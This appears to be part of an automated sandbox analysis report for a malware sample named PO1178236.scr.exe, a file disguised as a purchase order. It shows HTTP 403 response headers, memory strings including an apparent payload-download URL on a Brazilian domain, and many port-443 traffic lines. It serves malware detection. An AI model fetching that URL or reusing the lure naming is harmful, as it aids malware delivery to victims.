Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:39:05 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z2Bvmt8V87D31LWPjB%2BB00xj7lxcdA7wQ90OqmZjgPxUDs4iuj2eSoyANmwNb4RJM85k3lrAV8bl4G6RrKnYzzzoIU3sueu9kjDBXO1Ohkpvp06fA2u5wA2eIbatFpJpj58xvr%2F7z5KKlq3j"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c5215e664288-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1731&rtt_var=660&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2852&recv_bytes=704&delivery_rate=1645997&cwnd=246&unsent_bytes=0&cid=e790e9c74dffa1df&ts=143&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:39:06 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KiOeusJsNP94pgeb8LLwjrlnunC%2FQ2shdc%2BhuqYkOlwxrdWmRORv5NOSlpFdDvQC5AW6BGZPrwVwnRr3X%2FzAn6Sr7K76Wznmr7mznUjdUI3Az9aTQ%2FuqQeNuIiQrJ7V4jt21S7sN%2BSjeGKSK"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c5252f95184d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1651&min_rtt=1643&rtt_var=633&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1706604&cwnd=239&unsent_bytes=0&cid=17f47e1e2a65f730&ts=144&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:39:06 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cUhjrBgcIj9ETfcXsEhlAEFUiSMNmFetRYVfUQLmhK5teKAccx5CCwz4Ota5fcgwdf6j666kY7AkhnYBTE1muoEOWxBgj5YKqbgeW4e%2FvU3k1T0fNdDmFHtEt5UkstqTciscuacwgbqaz5V9"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c528c8c74302-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1559&rtt_var=594&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1827284&cwnd=252&unsent_bytes=0&cid=26d5d6a1613b3c90&ts=124&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:39:07 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uDRxZLH%2FqBUjQlDKjbiao1pJfFqnzX4z8veyVn9w5ewsacdpPgrL4pv22RgUbPHBIKnoJ2CQmjozu6v1iTx%2FOEIL2qhBQsUfASd2JPd63Bsk8uiRXWPj%2Fb0G71Asfw2KoVPvnZa%2FZDB3vPYc"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c52c9fa00f3e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1514&min_rtt=1511&rtt_var=574&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1894873&cwnd=217&unsent_bytes=0&cid=56473bf5d06e8adf&ts=155&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:39:07 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TLWfJKR5bw83W1UYIdfxvP1Hp1tnmRBwpm7oYXsCT%2B94xBw0Fda9wGCWpuGdEdGAevrBdV9TEw1iXuTwQRs3xOQAKH7PWAyROa%2BLNNS1ovfbZv1yPPVnUp2lcuyMHB%2B1i4rOafeoJxfKJ7CB"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c530bcff4291-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1760&min_rtt=1754&rtt_var=662&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1664766&cwnd=207&unsent_bytes=0&cid=87a8565699c4bab5&ts=150&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:39:08 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V7wfNRefZ0xQD1lrOaiTUry%2FDNvrt8AtaiAbTYkRuTj7rBQbTk55TS%2BTrFZBDSedhdSlCBFaFn9CHVRnDnIsOnxHgXCGX6VPvp5Wy0C2LG2NLFEm6dGEgCF4v4iWkHjr6ocO6JyqgON5Sli0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c5344f4080d6-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1709&min_rtt=1703&rtt_var=650&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1667618&cwnd=193&unsent_bytes=0&cid=bfb984bd8fe48a26&ts=118&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:39:09 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LCFvySotAO%2FiGJDkO6BDc2NRHeECUaYMruGcScYuKOdw8lwqRrxEJrR1u4AoKPs0AC%2BOK%2FUBF%2BnD6poJp2D6qx3coow2x4n%2FkIM4ZoOQLDCmKw3%2FFgc5TnKPrkKCXS8w4xP7DCuPRhklsn24"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c538198d42f5-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1577&rtt_var=594&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1838790&cwnd=195&unsent_bytes=0&cid=0329b9a0c3efa3fb&ts=130&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:39:09 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cbHblfpEWmaO%2FpyRtTuHY7J0s1LQUksYP8ZSEQiEbA59fvwoUEC36mhA%2B6sMS53UVpnNhU4V6I24%2FFLcpOU1TjnymIusr6rJr3ST%2FwEWwLD27bewBcBjAQmiJO8DDHf7SwatjhLge%2Fu%2Brmk8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c53bf9d1c472-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1629&min_rtt=1626&rtt_var=615&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1769696&cwnd=236&unsent_bytes=0&cid=a8469bb90d798c0f&ts=139&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:39:10 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZtOeOu6IyjDG%2FG5%2BGR5zOB1yAEWheIid5a0FsgXh2xpMQe752SPEN4knCIYQRVk%2Byq3kmmWZvuEitQWgj%2BuM9fCoIRqZ2tcv4Xl8yroyyjc2QBxXzLEgRn6hesqTD2%2BNVRqiW%2BBtj1n%2FxjfF"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c53fcce28c84-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1998&min_rtt=1995&rtt_var=755&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1442687&cwnd=176&unsent_bytes=0&cid=b58a7b3c997845cf&ts=134&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:39:10 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eMDPisynfQ0ysZr2tQGojhVhHAQpjG5IkA%2Bwyx9ArGOZr4Cm1QJCl90KNkqGBXRq1WdXfoX4ll7D5LPa4TYdbni%2F%2FFkQYx26XMuHO1p7e60oaV4UNN6ccL5hqtM0vEtX92HfjyXNk2fh%2B5jt"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c54368e642b0-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1918&min_rtt=1903&rtt_var=743&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1443400&cwnd=233&unsent_bytes=0&cid=1e236ddf2b30a4ef&ts=121&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:39:11 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=87R%2F1co0IAFWHoQzYzKHkOuhv8GcecL%2BlHVZxxTaJAB2VMA3Sxl8dNpg7wTxInpkDLEOvzpSd6aTly4vEF45lOM5fLjmI0j9jrK%2Bt1fY9r9n2cMvovmZMQ555mlOG8U2SUI4rTwBlTFtRrLg"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c5470ee2440d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1968&min_rtt=1952&rtt_var=764&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1403171&cwnd=178&unsent_bytes=0&cid=e02cae09070ebfdb&ts=127&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:39:12 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LLnj6ZxEPqW2zfXWillhBvTon0BN2vU99GLQg5Wr1J2eSNqobu2HnoiAv27vge1dAmQgkmdhWEGxjtkPPDA0HhoC%2Bqdn8hV7RA9QXYxJiAUO9q7ueq8v51DQ8TBvLsIRZtiP5U1%2BjRk622lG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c54aebda8c8f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1953&min_rtt=1950&rtt_var=737&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1478481&cwnd=209&unsent_bytes=0&cid=a924c23d2e2c0b6e&ts=150&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:39:12 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HaKsU97HsBeDby4fWy5MW3W33RtN6%2Bza8isFt1khvuihp6ElfONfeRBKYVF38YM7WM8gPUxHIRwutwjbnGEhiPMn8ac8RMCih2l2BaVXdX3WpHYMBfGkGWqD7fKojUY3TvVnnCwraxdPTyvV"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c54edc905e73-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2547&min_rtt=2541&rtt_var=966&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1125674&cwnd=206&unsent_bytes=0&cid=7e498469b4493b10&ts=150&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:58 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:39:13 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h1Qdtb3py%2BtzfPsbLR6zSzWp6BUdKCmZByGbVU7d35FCiOHUjyQJ%2FU2uRyqvLpGOzQRbDm5Q0FQLYg0M%2BEexIMA0klqQjkLQTRVyPsN5nM8MrLEVFOO1kUE9VbvH%2FVuc9XKDfVuvx1ATIs4A"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c5530e9841b2-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1692&min_rtt=1684&rtt_var=648&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1667618&cwnd=220&unsent_bytes=0&cid=f7a67443ad97a75d&ts=200&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:39:14 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ss6S8Zh9fZ6QBsNRf%2FOktW5GoK3ervImlY8P7eomFAuUnkljFjLcnscCfl3mseU%2FYRV4Dnz2wW%2BN8gn14AIak3MfYioZxmGkuaoIZZ1A88Q%2FwBswfQtM9m%2B6Vgq56yf9O2QDaXj9jreAEc3X"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c556fc7cc326-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1483&min_rtt=1473&rtt_var=573&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1874197&cwnd=240&unsent_bytes=0&cid=5f265200cbbde474&ts=158&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:39:14 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vqlEUv2SP2saZOhsBj3NrnnUrs3XL1Fyo4ono62qew5QsQaFZ66ED6OKkOeZ1x45uuLfB16lX%2F5%2Fb%2FDcVMfyRKnc2hx93d611oEQaszlEq8I%2FcYScLKRnlnhSpaMmgjoKxmrLOQzLgmIKS38"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c55c691072b9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1892&min_rtt=1873&rtt_var=741&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1440552&cwnd=214&unsent_bytes=0&cid=1b0506f7cc9600e2&ts=407&x=0"
Source: PO1178236.scr.exe, 00000000.00000002.3252624869.00000000025B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PO1178236.scr.exe, 00000000.00000002.3252624869.0000000003020000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3256952225.00000000064B6000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3256952225.0000000006422000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3256952225.0000000006400000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3256952225.0000000006460000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3256952225.0000000006325000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3252624869.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3252624869.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3256952225.0000000006191000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3252624869.0000000003060000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3256952225.0000000006236000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3252624869.0000000002C82000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3252624869.0000000002E8D000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3256952225.00000000063F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: PO1178236.scr.exe, 00000000.00000002.3252624869.00000000025B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.vascocorretora.com.br
Source: PO1178236.scr.exe, 00000000.00000002.3252624869.0000000003020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.vascocorretora.com.br/PPI/Lhysknp
Source: PO1178236.scr.exeString found in binary or memory: https://www.vascocorretora.com.br/PPI/Lhysknv.dat
Source: PO1178236.scr.exe, 00000000.00000002.3252624869.0000000003020000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3256952225.0000000006422000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3256952225.0000000006400000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3256952225.0000000006460000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3252624869.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3252624869.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3252624869.0000000002C82000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3252624869.0000000002E8D000.00000004.00000800.00020000.00000000.sdmp, PO1178236.scr.exe, 00000000.00000002.3256952225.00000000063F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.vascocorretora.com.brD
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
